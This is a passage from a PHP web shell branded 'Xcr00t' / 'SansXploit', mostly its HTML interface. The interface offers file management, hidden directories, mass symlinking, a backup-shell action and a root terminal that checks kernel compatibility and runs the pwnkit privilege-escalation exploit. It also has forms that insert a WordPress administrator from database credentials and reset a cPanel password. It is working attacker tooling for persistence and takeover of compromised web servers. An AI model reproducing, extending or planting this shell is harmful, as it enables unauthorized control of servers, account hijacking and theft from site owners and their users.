</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=phpini">
<i class="fas fa-cog fa-fw me-2"></i> PHP.ini
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=mass-symlink">
<i class="fas fa-link fa-fw me-2"></i> Mass Symlink
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=auto-shell">
<i class="fas fa-terminal fa-fw me-2"></i> Backup Shell
</a>
</li>
</ul>
</div>
</div>
</nav>
<div class="container-fluid py-4">
<?php if (isset($_GET['terminal']) && $_GET['terminal'] === 'root'): ?>
<div class="compatibility-info <?= $is_compatible ? 'compatible' : 'not-compatible' ?>">
<h4>
<i class="fas <?= $is_compatible ? 'fa-check-circle' : 'fa-times-circle' ?>"></i>
Kernel Version: <?= suggest_exploit() ?>
</h4>
<p>Status: <?= $is_compatible ? 'Compatible with pwnkit exploit' : 'Not compatible with pwnkit exploit' ?></p>
<?php if ($is_compatible): ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&action=pwnkit" class="btn quantum-btn">
<i class="fas fa-bolt"></i> Run Exploit
</a>
<?php endif; ?>
</div>
<?php if ($root_output): ?>
<div class="terminal"><?= htmlspecialchars($root_output) ?></div>
<?php endif; ?>
<?php endif; ?>
<!-- LOGO DAN SYSTEM INFORMATION YANG DIPERBAIKI -->
<div class="logo-container">
<div class="logo-wrapper">
<img src="https://k.top4top.io/p_3594s1tnx0.jpg"
alt="Xcr00toname x SansXploit"
class="round-logo"
onerror="this.style.display='none'; document.getElementById('logo-fallback').style.display='flex';">
<div id="logo-fallback" class="logo-fallback" style="display: none;">
Xcr00tM<br>×<br>SX
</div>
</div>
<div class="server-info text-light p-3">
<div class="row">
<div class="col-md-6">
<small>
<i class="fas fa-server"></i> Server: <?= $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown' ?><br>
<i class="fas fa-network-wired"></i> IP: <?= $_SERVER['SERVER_ADDR'] ?? $_SERVER['LOCAL_ADDR'] ?? 'Unknown' ?><br>
<i class="fas fa-user"></i> User: <?= get_current_user() ?> (<?= getmyuid() ?>)
</small>
</div>
<div class="col-md-6">
<small>
<i class="fas fa-microchip"></i> System: <?= php_uname() ?><br>
<i class="fas fa-code"></i> PHP: <?= phpversion() ?><br>
<i class="fas fa-folder-open"></i> Current Path: <?= getcwd() ?>
</small>
</div>
</div>
</div>
</div>
<!-- NOTIFIKASI -->
<?php if (isset($_GET['status'])): ?>
<div class="alert alert-<?= $_GET['status'] === 'success' ? 'success' : 'danger' ?> alert-dismissible fade show mt-3">
<?= $_GET['status'] === 'success' ? 'Operation completed successfully' : 'Operation failed' ?>
<button type="button" class="btn-close" data-bs-dismiss="alert"></button>
</div>
<?php endif; ?>
<nav aria-label="breadcrumb" style="margin-bottom: 1rem;">
<ol class="breadcrumb text-light p-3">
<li class="breadcrumb-item">
<a href="?Xcr00t&p=<?= enc($current_dir) ?>" style="color: #00ff9d; text-decoration: none; font-weight: 600;">
<i class="fas fa-home"></i> Root
</a>
</li>
<?php
$parts = explode(DIRECTORY_SEPARATOR, trim(PATH, DIRECTORY_SEPARATOR));
$path = '';
foreach ($parts as $part) {
if (!$part) continue;
$path .= DIRECTORY_SEPARATOR . $part;
echo '<li class="breadcrumb-item">';
echo '<a href="?Xcr00t&p=' . enc($path) . '" style="color: #00b8ff; text-decoration: none; font-weight: 500;">' . $part . '</a>';
echo '</li>';
}
?>
</ol>
</nav>
<div class="btn-toolbar mb-3">
<div class="btn-group me-2">
<button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#uploadModal">
<i class="fas fa-upload"></i> Upload
</button>
<button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#newDirModal">
<i class="fas fa-folder-plus"></i> New Folder
</button>
<button type="button" class="btn quantum-btn" data-bs-toggle="modal" data-bs-target="#newFileModal">
<i class="fas fa-file"></i> New File
</button>
<button type="button" class="btn btn-danger" data-bs-toggle="modal" data-bs-target="#newHiddenDirModal">
<i class="fas fa-folder-minus"></i> Hidden Folder
</button>
</div>
</div>
<!-- Hidden Directory Modal -->
<div class="modal fade" id="newHiddenDirModal" tabindex="-1">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Create Hidden Directory</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Directory Name</label>
<input type="text" class="form-control bg-dark text-light" name="hiddendirname" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
<button type="submit" name="newhiddendir" class="btn btn-danger">Create Hidden Directory</button>
</div>
</form>
</div>
</div>
</div>
<div class="table-responsive">
<table class="table table-hover quantum-table">
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php if (PATH !== $current_dir): ?>
<tr>
<td>
<a href="?Xcr00t&p=<?= enc(dirname(PATH)) ?>">
<i class="fas fa-level-up-alt"></i> ..
</a>
</td>
<td>-</td>
<td>-</td>
<td>-</td>
</tr>
<?php endif; ?>
<?php foreach ($dirs as $dir): ?>
<tr>
<td>
<a href="?Xcr00t&p=<?= enc(PATH . DIRECTORY_SEPARATOR . $dir) ?>">
<i class="fas fa-folder text-warning"></i> <?= htmlspecialchars($dir) ?>
</a>
</td>
<td>-</td>
<td><?= perms(PATH . DIRECTORY_SEPARATOR . $dir) ?></td>
<td>
<div class="btn-group btn-group-sm">
<a href="?Xcr00t&p=<?= enc(PATH) ?>&del=<?= urlencode($dir) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete directory?')">
<i class="fas fa-trash"></i>
</a>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $file): ?>
<?php $is_dir = is_dir(PATH . DIRECTORY_SEPARATOR . $file); ?>
<tr>
<td>
<?php if ($is_dir): ?>
<a href="?Xcr00t&p=<?= enc(PATH . DIRECTORY_SEPARATOR . $file) ?>">
<?= icon($file) ?> <?= htmlspecialchars($file) ?>
</a>
<?php else: ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>">
<?= icon($file) ?> <?= htmlspecialchars($file) ?>
</a>
<?php endif; ?>
</td>
<td><?= fmtSize(filesize(PATH . DIRECTORY_SEPARATOR . $file)) ?></td>
<td><?= perms(PATH . DIRECTORY_SEPARATOR . $file) ?></td>
<td>
<div class="btn-group btn-group-sm">
<?php if (!$is_dir): ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&act=edit&file=<?= urlencode($file) ?>" class="btn btn-outline-primary">
<i class="fas fa-edit"></i>
</a>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&act=download&file=<?= urlencode($file) ?>" class="btn btn-outline-success">
<i class="fas fa-download"></i>
</a>
<?php endif; ?>
<a href="?Xcr00t&p=<?= enc(PATH) ?>&del=<?= urlencode($file) ?>" class="btn btn-outline-danger" onclick="return confirm('Delete <?= $is_dir ? 'folder' : 'file' ?>?')">
<i class="fas fa-trash"></i>
</a>
</div>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</div>
<!-- Modals -->
<div class="modal fade" id="uploadModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Upload File</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post" enctype="multipart/form-data">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Select File</label>
<input type="file" name="file" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="upload" class="btn quantum-btn">Upload</button>
</div>
</form>
</div>
</div>
</div>
<div class="modal fade" id="newDirModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">New Folder</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Folder Name</label>
<input type="text" name="dirname" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="newdir" class="btn quantum-btn">Create</button>
</div>
</form>
</div>
</div>
</div>
<div class="modal fade" id="newFileModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">New File</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">File Name</label>
<input type="text" name="filename" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="newfile" class="btn quantum-btn">Create</button>
</div>
</form>
</div>
</div>
</div>
<!-- WP Admin Modal -->
<div class="modal fade" id="wpAdminModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Add WordPress Admin</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Database Host</label>
<input type="text" name="db_host" class="form-control bg-dark text-light" value="localhost" required>
</div>
<div class="mb-3">
<label class="form-label">Database Name</label>
<input type="text" name="db_name" class="form-control bg-dark text-light" required>
</div>
<div class="mb-3">
<label class="form-label">Database User</label>
<input type="text" name="db_user" class="form-control bg-dark text-light" required>
</div>
<div class="mb-3">
<label class="form-label">Database Password</label>
<input type="password" name="db_pass" class="form-control bg-dark text-light" required>
</div>
<hr>
<div class="mb-3">
<label class="form-label">Admin Username</label>
<input type="text" name="wp_user" class="form-control bg-dark text-light" required>
</div>
<div class="mb-3">
<label class="form-label">Admin Password</label>
<input type="password" name="wp_pass" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" name="submit" class="btn quantum-btn">Create Admin</button>
</div>
</form>
</div>
</div>
</div>
<!-- cPanel Modal -->
<div class="modal fade" id="cpanelModal">
<div class="modal-dialog">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">cPanel Password Reset</h5>
<button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
</div>
<form method="post" action="?Xcr00t&p=<?= enc(PATH) ?>&action=cpanel-reset">
<div class="modal-body">
<div class="mb-3">
<label class="form-label">Email Address</label>
<input type="email" name="email" class="form-control bg-dark text-light" required>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
<button type="submit" class="btn quantum-btn">Reset Password</button>
</div>
</form>
</div>
</div>
</div>
<?php if ($action === 'edit' && $target): ?>
<div class="modal fade show" style="display: block;">
<div class="modal-dialog modal-lg">
<div class="modal-content quantum-card">
<div class="modal-header">
<h5 class="modal-title">Edit: <?= htmlspecialchars($target) ?></h5>
<button type="button" class="btn-close btn-close-white" onclick="history.back()"></button>
</div>
<form method="post">
<div class="modal-body">
<textarea name="content" class="form-control bg-dark text-light" style="height: 400px; font-family: monospace;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $target)) ?></textarea>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" onclick="history.back()">Cancel</button>
<button type="submit" name="save" class="btn quantum-btn">Save</button>
</div>
</form>
</div>
</div>
</div>
<div class="modal-backdrop fade show"></div>
<?php endif; ?>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
<script>
// Background particle animation on the full-window canvas (flicker fix).
// Purely decorative: nothing in this script sends data or touches the server.
const canvas = document.getElementById('neuralNetwork');
const ctx = canvas.getContext('2d');
// Keep the canvas the same size as the browser window.
function resizeCanvas() {
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
}
resizeCanvas();
window.addEventListener('resize', resizeCanvas);
// One drifting dot: position, a small random velocity and a random radius.
class Node {
constructor(x, y) {
this.x = x;
this.y = y;
this.vx = (Math.random() - 0.5) * 0.3;
this.vy = (Math.random() - 0.5) * 0.3;
this.radius = Math.random() * 1.5 + 0.5;
}
// Move by the velocity and reverse direction at the canvas edges.
update() {
this.x += this.vx;
this.y += this.vy;
if (this.x < 0 || this.x > canvas.width) this.vx *= -1;
if (this.y < 0 || this.y > canvas.height) this.vy *= -1;
}
// Paint the dot with a slightly randomised opacity.
draw() {
ctx.beginPath();
ctx.arc(this.x, this.y, this.radius, 0, Math.PI * 2);
ctx.fillStyle = `rgba(138, 43, 226, ${0.2 + Math.random() * 0.1})`;
ctx.fill();
}
}
// 30 dots at random start positions.
const nodes = [];
for (let i = 0; i < 30; i++) {
nodes.push(new Node(Math.random() * canvas.width, Math.random() * canvas.height));
}
// Frame loop: a translucent fill fades the previous frame, then every dot is
// moved and redrawn.
function animate() {
ctx.fillStyle = 'rgba(10, 5, 25, 0.1)';
ctx.fillRect(0, 0, canvas.width, canvas.height);
nodes.forEach(node => {
node.update();
node.draw();
});
requestAnimationFrame(animate);
}
// The animation starts one second after the script runs.
setTimeout(animate, 1000);
// Fade out and remove every .alert element five seconds after page load.
document.addEventListener('DOMContentLoaded', function() {
const alerts = document.querySelectorAll('.alert');
alerts.forEach(alert => {
setTimeout(() => {
if (alert.parentNode) {
alert.style.transition = 'all 0.5s ease';
alert.style.opacity = '0';
alert.style.transform = 'translateY(-20px)';
setTimeout(() => {
if (alert.parentNode) {
alert.remove();
}
}, 500);
}
}, 5000);
});
});
// Speed up the logo's pulse animation while the pointer is over it.
document.addEventListener('DOMContentLoaded', function() {
const logo = document.querySelector('.round-logo');
if (logo) {
logo.addEventListener('mouseenter', function() {
// Clearing the animation first and re-applying it 10 ms later restarts it.
this.style.animation = 'none';
setTimeout(() => {
this.style.animation = 'logoPulse 1s ease-in-out infinite';
}, 10);
});
logo.addEventListener('mouseleave', function() {
this.style.animation = 'logoPulse 3s ease-in-out infinite';
});
}
});
</script>
</body>
</html>